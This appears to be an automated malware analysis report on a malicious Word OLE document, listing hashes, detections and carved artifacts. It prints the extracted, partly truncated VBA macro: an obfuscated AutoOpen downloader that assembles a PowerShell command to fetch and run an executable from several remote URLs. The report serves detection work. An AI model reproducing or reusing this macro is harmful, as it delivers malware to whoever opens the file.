Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2f9ff572c6ce1e2a…

MALICIOUS

Office (OLE)

Size: 221.6 KB
Created: 2018-09-13 20:12:00
Authoring application: Microsoft Office Word
First seen: 2020-01-07
MD5: a763d9c5fcac9ef479e87290be1f3cb8
SHA-1: 75280b7ff62fe39599a99619f20e30eadd726210
SHA-256: 2f9ff572c6ce1e2a66fac5610e104d52936edaa7affea1e804fbcd2b762e4d54
Risk Score: 302

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File

The sample contains a legacy WordBasic AutoOpen macro, which is a strong indicator of malicious intent. The macro attempts to execute a command that appears to download and run a second-stage payload, as suggested by the obfuscated string construction within the `YanqzO` function. The presence of multiple embedded OLE objects and a large slack space further supports the malicious nature of the file.

Heuristics (7)

  • ClamAV: Doc.Malware.Valyria-6786371-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6786371-0
  • Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 226,944 bytes but its declared streams total only 53,897 bytes — 173,047 bytes (76%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4198 bytes
SHA-256: ddbe5d74b00c7f23bf5929159fd489fce5eeab2addbe3d9fcddcec08e0dd617e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "GGOLVvIE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
   Dim AWZrnr()
ReDim AWZrnr(2)
AWZrnr(0) = 271
AWZrnr(1) = 391205782

   Dim qpZoAB()
ReDim qpZoAB(3)
qpZoAB(0) = 1
qpZoAB(1) = 3
qpZoAB(2) = 2

   Dim LcDpDD()
ReDim LcDpDD(2)
LcDpDD(0) = 9
LcDpDD(1) = 295107707

   Dim PXPAIR()
ReDim PXPAIR(4)
PXPAIR(0) = 588
PXPAIR(1) = 27
PXPAIR(2) = 925
PXPAIR(3) = 8

   Dim aXqpjm()
ReDim aXqpjm(2)
aXqpjm(0) = 36
aXqpjm(1) = 5

Shell@ YanqzO + fzlGMvlij + bwmlcFlizZrE, Format(0)
   Dim NUZZzZ()
ReDim NUZZzZ(3)
NUZZzZ(0) = 528
NUZZzZ(1) = 75
NUZZzZ(2) = 7649

End Sub



Attribute VB_Name = "XYELbCbiVYbsX"
Function YanqzO()

On _
Error _
Resume _
Next
Dim zpMYCY()
ReDim zpMYCY(4)
zpMYCY(0) = 288860622
zpMYCY(1) = 736
zpMYCY(2) = 316137629
zpMYCY(3) = 394279374

LfVVPjIn = Format(Chr(18 + 11 + 11 + 8 + 51)) + "md /V/" + Format(Chr(12 + 7 + 7 + 5 + 36)) + Format(Chr(5 + 3 + 3 + 2 + 21)) + "^se^t ^8I=^      ^  ^" + " ^ ^    ^ ^  ^}^}^{^h" + Format(Chr(18 + 11 + 11 + 8 + 51)) + "t" + "a" + Format(Chr(18 + 11 + 11 + 8 + 51)) + "}^;ka^er^b;U^q" + "N$^ metI^-ekovnI^;)^" + "UqN$ ,vl^P^$(el^i^F^da" + "^olnwo^D.EVw${yrt^{)^f^j^z" + "^$ n^i v^lP$(h" + Format(Chr(18 + 11 + 11 + 8 + 51)) + "^aer^o^f" + "^;'^exe.^'+Va^o^$+'^\^'^+" + Format(Chr(18 + 11 + 11 + 8 + 51)) + "^i^l" + "^b^u^p^:vne^$^=UqN^$^;'7^"
Dim KYAwM()
ReDim KYAwM(5)
KYAwM(0) = 6
KYAwM(1) = 6780
KYAwM(2) = 28
KYAwM(3) = 43722461
KYAwM(4) = 532

   Dim hNmRU()
ReDim hNmRU(2)
hNmRU(0) = 475
hNmRU(1) = 108198689

   Dim pjKDzz()
ReDim pjKDzz(4)
pjKDzz(0) = 505
pjKDzz(1) = 1
pjKDzz(2) = 653
pjKDzz(3) = 29

   Dim MWIiU()
ReDim MWIiU(2)
MWIiU(0) = 5821
MWIiU(1) = 2312

   Dim uaIaGF()
ReDim uaIaGF(5)
uaIaGF(0) = 359
uaIaGF(1) = 575
uaIaGF(2) = 337
uaIaGF(3) = 128214803
uaIaGF(4) = 145901713

IOjQMaQ = "84^'^ " + "=^ V^a^o^$;)^'^@" + "^'(t^i^l^" + "p^S.^'d/" + "^s^ed^ul" + Format(Chr(18 + 11 + 11 + 8 + 51)) + "n^i/ni^m^da^-"
Dim FJYfQ()
ReDim FJYfQ(3)
FJYfQ(0) = 951
FJYfQ(1) = 52
FJYfQ(2) = 3

   Dim UFFvN()
ReDim UFFvN(5)
UFFvN(0) = 5
UFFvN(1) = 80
UFFvN(2) = 705
UFFvN(3) = 105
UFFvN(4) = 7481

   Dim izqOH()
ReDim izqOH(4)
izqOH(0) = 1
izqOH(1) = 81
izqOH(2) = 6
izqOH(3) = 794

   Dim LZScO()
ReDim LZScO(4)
LZScO(0) = 176349511
LZScO(1) = 23
LZScO(2) = 1
LZScO(3) = 78

paSqjwVOT = "^p^w/mo" + Format(Chr(18 + 11 + 11 + 8 + 51)) + "^.rem^a^git^l^u." + "^www//:pt^th^@" + Format(Chr(18 + 11 + 11 + 8 + 51)) + "^e^" + "d^w^WtPR/^m^o" + Format(Chr(18 + 11 + 11 + 8 + 51)) + "^.er^a^" + "wt^f^oslage^l" + "^enilno//^:" + "p^t^t^h@O^Z4/m^o" + Format(Chr(18 + 11 + 11 + 8 + 51)) + ".ev^los" + "^-^irt.^ww^" + "w//^:^p^tth" + "^@" + Format(Chr(12 + 7 + 7 + 5 + 36)) + "/mo" + Format(Chr(18 + 11 + 11 + 8 + 51)) + "^.i^k^so^d^er^e" + "ws" + Format(Chr(18 + 11 + 11 + 8 + 51)) + "ire//^:ptth@Y^Li" + "^B^wxx/^mo"
Dim rkrCuA()
ReDim rkrCuA(4)
rkrCuA(0) = 48
rkrCuA(1) = 5
rkrCuA(2) = 6
rkrCuA(3) = 61

   Dim PiiaPC()
ReDim PiiaPC(3)
PiiaPC(0) = 326
PiiaPC(1) = 9265
PiiaPC(2) = 209856713

zsCHFprwK = Format(Chr(18 + 11 + 11 + 8 + 51)) + ".100gnai^ji^ak//:" + "^pt^t^h^'^=fj^z^$;" + "tn^eil" + Format(Chr(12 + 7 + 7 + 5 + 36)) + "beW.^teN^ t" + Format(Chr(18 + 11 + 11 + 8 + 51)) + "ej^bo^-wen" + "^=EVw^$^ l^le^hsrew" + "^o^p&&^f^or /^L %^" + "s ^in (^"
Dim DBCDcZ()
ReDim DBCDcZ(2)
DBCDcZ(0) = 465507000
DBCDcZ(1) = 253

QLHZknzozrV = "382,^-1^,0)d^o ^s" + "e^t ^q^7R" + "X=!^q^7RX!!^8I:~%^s,1!&&i^f %" + "^s l^s^s ^1 " + Format(Chr(18 + 11 + 11 + 8 + 51)) + "all %^q^7RX:^*q7" + "RX^!^=%" + Format(Chr(5 + 3 + 3 + 2 + 21)) + ""
YanqzO = LfVVPjIn + IOjQMaQ + paSqjwVOT + zsCHFprwK + QLHZknzozrV
   Dim jkLfh()
ReDim jkLfh(4)
jkLfh(0) = 7905
jkLfh(1) = 4647
jkLfh(2) = 45
jkLfh(3) = 1136

   Dim GQtwz()
ReDi
... (truncated)
embedded_office_off00012780.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0x12780 151296 bytes
SHA-256: 124e1a847bb708882b9334dee1ffe7c99980343a30d7c9c860a932f677583d36
Detection
ClamAV: Doc.Malware.Valyria-6786371-0
Obfuscation or payload: unlikely
embedded_office_off00024f00.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0x24F00 75648 bytes
SHA-256: 8b808398cdf8bcb4dd059f8ae734fe5239594105ad4faacd6af89cf2bff68f32
Detection
ClamAV: Doc.Malware.Valyria-6786371-0
Obfuscation or payload: unlikely